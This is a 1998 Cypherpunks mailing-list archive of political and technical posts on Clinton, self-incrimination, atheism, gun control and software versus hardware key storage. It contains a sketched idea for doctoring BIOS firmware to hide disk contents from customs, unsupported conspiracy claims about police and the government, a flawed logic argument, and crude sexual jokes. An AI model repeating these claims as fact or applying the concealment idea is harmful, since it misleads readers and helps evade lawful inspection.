out degree mail, people surfing, who's on, all my degrees and lots 
more. Click the URL below to see how you can get the most out of 
your personal global community on the Web:

        http://www.sixdegrees.com/Public/WhatsNew.asp

And make sure you stop by the URL below to read a letter from the 
president of sixdegrees to find out how your sixdegrees experience
has changed:

        http://www.sixdegrees.com/Public/PresidentLetter.asp

=================================================================
6.  C H A T - T A S T I C   E V E N T S:

We've got some enticing chat-events lined up so make sure you stop 
by the URL below to learn more about celebrity chat-interviews with 
the following people: Andrew Weinreich, president of sixdegrees, 
Allan Steinfeld, runner extrodinaire, Robin Gorman Newman, writer 
and singles expert and Georgia Durante, stuntwoman and biographer:

        http://www.sixdegrees.com/Chat/chat.cfm

=================================================================
L O S T   P A S S W O R D?

If you can't remember your sixdegrees password, simply go to our 
password resend page and we'll be happy to send you a new one.
        
        http://www.sixdegrees.com/PasswordResend.cfm

=================================================================
Q U E S T I O N S? 

Just e-mail our member services department at issues@sixdegrees.com 
for a prompt and courteous response or stop by the following URL 
and see if our FAQ can answer your questions.

        http://www.sixdegrees.com/Public/About/faq.cfm

* Or visit the Help Desk room in chat every weekday between 1 and 
5 pm EST and get your sixdegrees questions answered in real time.

        http://www.sixdegrees.com/Chat/chat.cfm

=================================================================
T O   U N S U B S C R I B E:

If you'd rather not receive your "sixdegrees Member Update" 
which is published twice a month, but would still like to remain 
a sixdegrees member, just send a reply to this e-mail that reads 
only UNSUBSCRIBE in the subject line or stop by the URL below 
and log in with your e-mail address and password to unsubscribe 
directly at the site:

        http://www.sixdegrees.com/Services/profile/email.cfm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 21 Sep 1998 15:28:41 +0800
To: Michael Motyka <petro@playboy.com>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <199809212028.QAA07893@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:14 PM 9/21/98 -0700, Michael Motyka wrote:

>In spite of their <numerous?> shortcomings, many of today's politicians
>in both parties seem to be fairly pragmatic, 'middle of the road' types.
>If the only people who can pass muster under the emerging standards are
>religous fundamentalists then we will have a Bill of Rights under attack
>problem that is another order of magnitude greater than we have right
>now. Scares me because while I'm pretty much a live and let live sort,
>some of the fundamentalists I've known are not very tolerant. 
>
>Mike

The commies I've known are even less tolerant:

>From: OBRL-News <demeo@mind.net>
>To: obrl-news@lists.village.Virginia.EDU
>Subject:- FDA Book-Burning... Again!
>
>Orgone Biophysical Research Lab <demeo@mind.net>
>http://id.mind.net/community/orgonelab/index.htm
>Forwarded News Item
>
>Please copy and distribute to other interested individuals and groups
>
>**********
>
>>         FDA Orders Destruction of Stevia Books
>>
>>On May 20, 1998, the U.S. Food and Drug Administration (FDA)
>>ordered the destuction of 2,500 books about the herbal sweetener
>>stevia. A small company in Arlington Texas, Stevita, Co., was
>>visited by the FDA and forced to stop selling stevia and books
>>that mention that stevia can be used as a sweetener.

Just another regulatory book burning.  (Oops, book *pulping* burning is
environmentally incorrect.

There are plenty of commies itching to fine me, fire me, or lock me up for
criticizing congresscritters within 6 months of an election (campaign
finance reform), refusing to attend their re-education and self criticism
sessions (racial/sexual harassment awareness training), or mailing a number
10 envelope customers (illegal medical device labeling - I kid you not). 

A fundie admin would issue fewer total regs than a commie-liberal admin
(experience suggests) so freedom would be in better shape on balance.
Chart the annual pages of the Federal Register issued by Dems vs Reps.
Dems are *way* out in front.  Taxes would almost certainly be lower
(Clinton's are the highest in peacetime history).

I wouldn't worry.  If we survived Clinton we can survive the Republicans.
Meanwhile the Presidency has been weakened.

DCF


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Mon, 21 Sep 1998 17:20:47 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <v03102801b22c78717df0@[192.168.3.63]>
MIME-Version: 1.0
Content-Type: text/plain



>Petro wrote:
>>
>> At 11:50 AM -0500 9/21/98, Michael Motyka wrote:
>> >Starr's base approach to justice is the opening shot of what I hope
>> >turns into an all-out scorched-earth battle. Let 'em all fall down. I'm
>> >just afraid that when it's over the only people who will be willing to
>> >run for public office will be truly dangerous people who have no respect
>> >for liberty not of their own definition.
>>
>>         Which is different from today how?
>>
>In spite of their <numerous?> shortcomings, many of today's politicians
>in both parties seem to be fairly pragmatic, 'middle of the road' types.
>If the only people who can pass muster under the emerging standards are
>religous fundamentalists then we will have a Bill of Rights under attack
>problem that is another order of magnitude greater than we have right
>now. Scares me because while I'm pretty much a live and let live sort,
>some of the fundamentalists I've known are not very tolerant.
>
>Mike

I know it's a mistake to reply to this stuff but it would be nice for
someone to maintain the context. Clinton was on trial for sexual
harrassment. When giving testimony under oath he chose to lie in order to
cover his own ass. I don't much care about the private lives of politicians
but I do care how they behave in public places like courts of law. That is
what he is trouble for, not for his filandering proclivities which were
public known before he became president. Just to help the Clintonites
understand: "It's about perjury, stupid!"

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 17:19:46 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: This is a listed crime? (fwd)
Message-ID: <199809212245.RAA18928@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: This is a listed crime?
> Date: Mon, 21 Sep 1998 13:32:19 -0700

> Regarding the 5th amendment and other laws and precedence involving the
> right to remain silent, the right against self-incrimination, etc, how
> far could one carry that as an excuse to remain silent?

As far as ones convictions and intestinal fortitude will take them.

Simply tell them you won't answer any of their questions, you'd like to make
your phone call *now*, and you want to see a judge *now*.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 21 Sep 1998 12:57:54 +0800
To: Jim Choate <cypherpunks@toad.com>
Subject: Re: This is a listed crime?
In-Reply-To: <199809211700.MAA17197@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980921165825.397U-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, 21 Sep 1998, Jim Choate wrote:

>
>>   dont want to take the time to look up the 18 USC reference, but
>>   providing deliberately false information to _any_ federal agent 
>>   is a felony--  that includes the IRS. if nothing else, such as
>>   telling a federal agent to fuck-off, they will charge you with
>>   obstruction of justice.
>
>The trick is to tell them you are using your Constitutional right to refuse
>to answer under the 5th. At that point they can arrest you, and you get
>protection via a lawyer and the other processes, or they can go away. If
>after this responce they continue to ask you question they are in fact
>harassing you and you can press charges for that.
>
    agreed, in theory. but how do you protect yourself when two or more
    take the stand and swear under oath that you said: "......" or, even:
    "I dont know nuthin' 'bout it" --which has already been interpreted
    to a lie it can be proved to a material witness, etc.
    
    dealing with the Feds is very similiar to the pecking order of traffic
    which was suggest to me once in Zuerich:
    
    	trolleys
    	lorries
    	buses
    	natives
    
    presume the man with a badge and a gun is a native. the burden of
    proof is on you that an agent of our honest, democratically elected
    government is harassing you. I have seen clear evidence of wiretapping
    presented, the judge called two gestapos to the stand, and asked them
    point blank: "did you wiretap [authorized or unauthoized], or were 
    you aware of a wiretap; or did you receive reliable or unreliable
    information which might have been only obtainable by wiretap or
    bugging?" and watch both agents straight face lie --one going so
    far as to say: "no, your Honor, that would be against the law.
    
    in the same vein of evidence: why do "officers of the law" carry an
    extra Saturday Night Special? --in case they drop someone, they can
    justify their assassination on the basis the deceased was armed and
    dangerous; or, why does a wanted poster for a meek bean counter who
    disappeared after touching his employer say: "presume armed and 
    dangerous"? --covers LEOs if they drop the miscreant on sight.
    
    the intent of the laws should be evident to everyone. the reality of
    the laws is the rules of evidence are heavily loaded in favour of
    the armed and dangerous officers sworn to uphold the law --as they
    see fit. a little old lady who only walks to the store and to church
    can be busted for something --be creative.
    
    the U.S. legal system has been distorted to the point it could
    easily be considered the enforcement arm of a totalitarian state.
    I do consider we have had a valid government since 08 Mar 1933 when
    FDR, 4 days after his inaugeration hoodwinked Congress into make
    'us' the enemy in the Trading With the Enemy Act of 1917, validating
    the executive order, and declaring a national emergency. all three
    actions still stand -the national emergency continues.
    
    the American theory is wonderful; the American experience not always
    so wonderful.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: No safety this side of the grave. Never was; never will be.
Charset: noconv

iQA/AwUBNgaRlj7vNMDa3ztrEQJZqQCgrmq55Z0oX7grZURPfY8G8qWyU5IAnjvw
ZdQyAZK10TYHumCKvTgjZxXo
=HJaz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Hoover <doug@arcot.com>
Date: Mon, 21 Sep 1998 19:56:02 +0800
To: coderpunks@toad.com
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809211030.FAA05159@mixer.visi.com>
Message-ID: <3606F570.FFFDDA3C@arcot.com>
MIME-Version: 1.0
Content-Type: text/plain

In response to the interest indicated by the discussion on coderpunks/cipherpunks
mailing lists, we have put a technical note about the Arcot key container
("software smart card") on our site at:

        http://www.arcot.com/camo2.html

We would appreciate your comments.

This note doesn't tell everything about our method--we *are* developing a
commercial product, after all--but we hope that it will suffice to show
knowledgeable readers our main ideas and convince them that a software key
container that provides protection similar to that of a smart card is in fact
possible.

I should remark that:

- Arcot key protection does not depend on making client-side
  software complicated or on keeping the algorithms secret.  It
  depends on making it hard for an attacker to tell when he has
  cracked it, by keeping information that the attacker might use
  to identify the private key out of his reach (such as the
  public key).

- Consequently, there are significant restrictions on the
  situations in which Arcot key protection works.  For example:

  - It isn't useful for encryption.
  - It isn't good for stranger-to-stranger authentication.
  - It is good for authenticating yourself to your bank, an
    online merchant with whom you have an account, or to your
    employer.

- Like smartcards, it provides two-factor authentication--you
  need to have the key container and know the password in order
  to authenticate.  Its key protection is slightly weaker because
  it is easier to steal (just copy) a card without the theft being
  noticed.

- Of course, the crypto has to be done in software.  If your
  application warrants that level of paranoia, then maybe you
  really should be using hardware--but are you sure that your
  smart card is really signing the document you think it
  is?   Most commercial applications don't warrant this level
  of paranoia.  And hardware costs money.


Regards,

Doug Hoover



begin:          vcard
fn:             Douglas Hoover
n:              Hoover;Douglas
org:            Arcot Systems
adr:            2197 Bayshore Rd;;;Palo Alto;CA;94303;US
email;internet: doug@arcot.com
tel;work:       650 470-8203
tel;fax:        650 470-8208
x-mozilla-cpt:  ;0
x-mozilla-html: TRUE
version:        2.1
end:            vcard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 17:53:19 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809212320.SAA19200@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
> Date: Mon, 21 Sep 1998 13:09:30 -0700

> Jim Choate wrote:
> > As I've demonstrated before (and for the last time):
> > 
> > ^(A) = (^A)
> 
> f() = belief function
> A = hypothesis
> ^ = not
> 
> f(^A) != ^f(A)

Prove it.

The f in your f() is redundant, but I can work with it.

Simply stating it over and over isn't proof.

We're doing Boolean Algebra here not Algebra, the rules for transitory
functions are different.

I'll even do you a favor and list the Boolean Laws and Theorems for you:

1)	X+0=X				X*1=X
2)	X+1=1				X*0=0
3)	X+X=X				X*X=X
4)	(X')'=X
5)	X+X'=X				X*X'=0
6)	X+Y=Y+X				X*Y=Y*X
7)	(X+Y)+Z=X+(Y+Z)			(XY)Z=X(YZ)=XYZ
	       =X+Y+Z
8)	X(Y+Z)=XY+XZ			X+YZ=(X+Y)*(X+Z)
9)	XY+XY'=X			(X+Y)*(X+Y')=X
10)	X+XY=X				X(X+Y)=X
11)	(X+Y')Y=XY			XY'+Y=X+Y
12)	(X+Y+Z+...)'=X'Y'Z'...		(XYX...)'=X'+Y'+Z'+...
13)	[f(X1, X2, X3,...,0,1,+,*)]'= f(X1', X2', X3',...,1,0,*,+)
{The following two are called Duality Theorems, not important here}
14)	(X+Y+Z+...)^D = XYZ...		(XYZ...)^D=X+Y+Z+...
15)	[f(X1, X2, X3, ...,0,1,+,*)]^D=f(X1, X2, X3,...,1,0,*,+)
16)	XY+YZ+X'Z=XY+X'Z		(X+Y)*(Y+Z)*(X'+Z)=(X+Y)*(X'+Z)
17)	(X+Y)(X'+Z)=XZ+X'Y
 
The ones you and your dualist-atheism buddies are confused on are #4, #12,
& #13.

By #4 we have:

^(X)=(^X)

By #12 we have:

^(X)=^X

By #13 we have:

^f(X) = f(^X)

All are clearly contrary to your assertion.

Balls in your court junior.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 17:56:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809212323.SAA19241@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 21 Sep 1998 16:05:30 -0400
> From: Sunder <sunder@brainlink.com>
> Subject: Re: Stego-empty hard drives...

> What's this bullshit, eh?  Just overwrite the BIOS roms in your machine to
> return all zeros for the sectors you don't want to show them.  Have some
> special passphrase you have to type in while in the BIOS setup program to
> deactivate this.  Most newer notebooks have flash upgradeable ROMs anyway.

What's this bullshit, eh?

I wonder how you propose to answer the question:

"Sir, exactly why are you typing that sentence into the computer at this
time?"

Now we have not only given them probably cause but clear evidence for a
prior intent to commit a crime. Even if your hard drive is clean they're
going to bust your ass.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 17:58:25 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Alone (fwd)
Message-ID: <199809212325.SAA19295@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 21 Sep 1998 18:38:16 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Alone

> 
> "...it depends on how you define 'alone'.".
> 
> Alone enough to get a blowjob?
> 

That depends Bob, can you bend over that far?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 17:59:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Alone (fwd)
Message-ID: <199809212326.SAA19342@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Bob,

Sorry, nothing personal but with an opening like that I couldn't help
myself. Please forgive me.
 
Forwarded message:

> From: Jim Choate <ravage@einstein.ssz.com>
> Subject: Alone (fwd)
> Date: Mon, 21 Sep 1998 18:25:01 -0500 (CDT)

> Forwarded message:
> 
> > Date: Mon, 21 Sep 1998 18:38:16 -0400
> > From: Robert Hettinga <rah@shipwright.com>
> > Subject: Alone
> 
> > 
> > "...it depends on how you define 'alone'.".
> > 
> > Alone enough to get a blowjob?
> > 
> 
> That depends Bob, can you bend over that far?
> 


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 18:03:44 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809212328.SAA19426@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 21 Sep 1998 16:03:50 -0400
> From: Duncan Frissell <frissell@panix.com>
> Subject: Re: Clinton's fake apologies (fwd)

> and you don't want to do a Referral with insufficient proof.  Notice that
> even with proof of multiple felonies the Clintonistas say that they aren't
> important felonies.

Next time somebody gets busted for possession with intent they need to make
reference to this case...

"But ladies and gentlemen of the jury, as our President has claimed and
clearly demonstrated by his remaining in office, for a person to be
convicted on a felony it has to be an important felony. The defence has not
proven that this felony has sufficient weight for prosecution. You have no
choice but to aquit my client."


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 21 Sep 1998 17:44:44 +0800
To: cypherpunks@cyberpass.net
Subject: My favorite Clinton Quote from Today...
Message-ID: <v0401170cb22c84665776@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



"I'm trying to be honest with you, and it hurts me."

:-).

"I am not a crook."?

Cheers,
Bob Hettinga

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 21 Sep 1998 17:45:15 +0800
To: cypherpunks@cyberpass.net
Subject: Alone
In-Reply-To: <3.0.5.32.19980921164331.00855a10@telepath.com>
Message-ID: <v0401170fb22c85438b84@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Clinton:

"...it depends on how you define 'alone'.".

Alone enough to get a blowjob?

Cheers,
Bob Hettinga

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 18:23:17 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809212348.SAA19564@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 21 Sep 1998 15:18:28 +0000 (GMT)
> From: attila <attila@hun.org>
> Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)

>       father:	  so... you "deny" God's existence since their is no
>       		  "proof" of His existence. did you ever consider that in
>       		  order to "deny" anything, you must have defined that
>       		  concept?  in other words, to deny God, you must have
>       		  determined that I or someone else has defined God in
>       		  order for you to be able to "deny" God?

So, what has the issue of defining something got to do with its existance?
Is this bozo really claiming that God can only exist unless somebody thinks
him up? Sounds like religous hubris to me...

God was shinning on this asshole that he never had to argue face to face
with me at that age...

>       counselor:  is there a difference between belief and faith?

The spelling.

>       father:	  aethism is a concept which is almost impossible to
>       		  define as it is a denial that if it could it doesnt.
>       		  it is much easier to defend "agnosticism" where you
>       		  admit you do not believe, or have faith, because you
>       		  lack sufficient scientific proof. aethism is not
>      		  doubting, it is denying, even in the face of proof.

Agnosticism has *nothing* to do with scientific proof. It existed eons
before anyone even thought of the scientific method. Skepticism is a part of
human nature, not philosophy, beliefs, or science.

Atheism is saying that while God could exist he doesn't. In other words it
is the belief that God doesn't exist and can't be proven contrary. There is
a fundamental belief that all proofs are flawed.

Agnosticism is the inability to believe one way or the other. It could be
characterized by a total lack of faith in anything (assuming one doesn't
want to argue about the meaning of 'total' and 'anything'). What keeps
agnosticism appart from nearly all other beliefs is that it is really trying
to answer two question and not one (Does God exist?), they are:

1.	Does God exist?

2.	Do I believe the proof in 1.?

It is the embodyment of skeptiscism. The fact that most religions that
accept 1. accept 2. as a given is why they are hubric.

> 		  suppose you die, and despite your lack of belief or
> 		  faith, you find yourself before the throne of God.

My own personal suspicion is he's going to ask you whether you lived your
beliefs even in the face of overwhelming opposition. As long as you say
"Yes" he's going to be a happy camper.

To borrow a Christian icon, he's going to want to know if you worshiped
false idols.

>     they believe as truth, is futile. I will accept, without trying to
>     change, anyone's "religious" beliefs as their beliefs; I only ask 
>     they extend the same tolerance to me.

Ditto.

Since this doesn't particular avenue has little more to be said I'm going to
drop it.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Mon, 21 Sep 1998 18:40:36 +0800
To: "Jean-Francois Avon" <jf_avon@citenet.net>
Subject: Re: [short] Updated quote from Allan Rock
In-Reply-To: <199809211555.LAA10768@cti06.citenet.net>
Message-ID: <3.0.2.32.19980921190749.00803ac0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I wonder if this fellow would allow that the protection of HIS life 
is "NOT a legitimate use for a firearm...".

Edwin

At 11:51 AM 9/21/98 -0400, you wrote:
>This is the complete quote from Alan Rock, then justice minister who 
pushed 
>the gun control, registration and confiscation bill (C-68).
>
>
>"I came to Ottawa with the firm belief that the only people in this
>country who should have guns are police officers and soldiers."
>
>-- Allan Rock, Canada's Minister of Justice, quoted in _Maclean's_
>        "Taking Aim on Guns", April 25, 1994, page 12.
>
>
>"... protection of life is NOT a legitimate use for a firearm 
>     in this country sir! Not! That is expressly ruled out!". 
> 
>  Justice Minister Allan Rock
>  "Canadian justice issues, a town hall meeting"
>  Producer - Joanne Levy,   
>  Shaw cable, Calgary (403) 250-2885
>  Taped at the Triwood community centre in Calgary Dec.1994 
>
>
>
>
>Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
>
>  JFA Technologies, R&D physicists & engineers
>     Instrumentation & control, LabView programming
>PGP keys: http://bs.mit.edu:8001/pks-toplev.html
>PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
>PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNgbcREmNf6b56PAtEQK1HwCg8c13Fm/FwvER+tyF91TftxptnfsAn3cD
LWRAAWlwA6853SWDAjNZgSbB
=932g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 18:42:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: [short] Updated quote from Allan Rock (fwd)
Message-ID: <199809220010.TAA19732@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 21 Sep 1998 19:07:49 -0400
> From: "Edwin E. Smith" <edsmith@IntNet.net>
> Subject: Re: [short] Updated quote from Allan Rock 

> I wonder if this fellow would allow that the protection of HIS life 
> is "NOT a legitimate use for a firearm...".

It is further clear the police don't carry them for their own protection
either. Wonder why they do carry them?...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 21 Sep 1998 21:53:19 +0800
To: cypherpunks@cyberpass.net
Subject: Have a cigar
In-Reply-To: <360683E5.26C6@lsil.com>
Message-ID: <v03130309b22cc1699731@[209.133.20.24]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:03 PM -0700 9/21/98, Duncan Frissell wrote:

>
>Like Clinton, right?  I certainly like to see the damage to the Presidency.
> We also don't have to worry about any tobacco legislation for a few years.
>

Yep. Give the man a cigar.

The paralysis of the U.S. government is heartwarming. No talk about sending
troops to Kosovo, no plans to give the IMF more money to send to Russian
and Wall Street mafiosos (mafiosi?), no talk of sending life preservers to
the tens of millions of Bengalis drowning and sinking into the muck in
Dacca, and not much of anything else.

I love it.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 21 Sep 1998 19:48:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809220116.UAA20070@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 00:46:03 +0000
> From: Michael Hohensee <mah248@is9.nyu.edu>
> Subject: Re: Stego-empty hard drives... (fwd)

> I believe that the idea was to set it up so that BIOS defaults to
> HD-hiding mode.

How do you propose to do this? Via a BIOS setting?

> When you're taking your laptop through customs, you do
> nothing while the machine boots up, the doctored BIOS does its thing,
> and everybody's happy.  When you want to get at the stuff on the rest of
> the HD, you reboot and type in your passphrase.

How do you propose to prompt the user for the correct time to type?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Mon, 21 Sep 1998 22:49:04 +0800
To: "Nick Szabo" <scott@loftesness.com>
Subject: RE: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220131.SAA11293@shell7.ba.best.com>
Message-ID: <001201bde5dc$6ed105c0$1330c4c2@cypherpunks.aec.at>
MIME-Version: 1.0
Content-Type: text/plain



Nick,

I am somewhat puzzled by your response. Do you assert that a software based
solution, executed on a general purpose CPU under a general purpose OS, can
afford the same protection of whatever the secret in question may be as a
hardware token, such as a smartcard? A hardware token lacking the very API
to extract the secret through software based attacks?

If so, could you please share with us the revolutionary breakthrough in
computer science that negates the effect of decompilers and runtime
debuggers on Arcot's software?

Furthermore, how do you consolidate the claim on Arcot's website that
"ArcotSignTM [...] offers [hardware solution] tamper resistance in software"
with the statement by Arcot's very own cryptographic advisor, Bruce
Schneier, that "Of course. It's less secure than hardware solutions".

Perhaps I have worked in this industry for too long to fully adjust to the
novel genius displayed in "virtual one-time pads", "virtual smartcards", and
"virtual security".

Thanks,
--Lucky Green <shamrock@netcom.com>
  PGP 5.x  encrypted email preferred

> -----Original Message-----
> From: owner-cryptography@c2.net [mailto:owner-cryptography@c2.net]On
> Behalf Of Nick Szabo
> Sent: Monday, September 21, 1998 18:31
> To: rdl@MIT.EDU; scott@loftesness.com
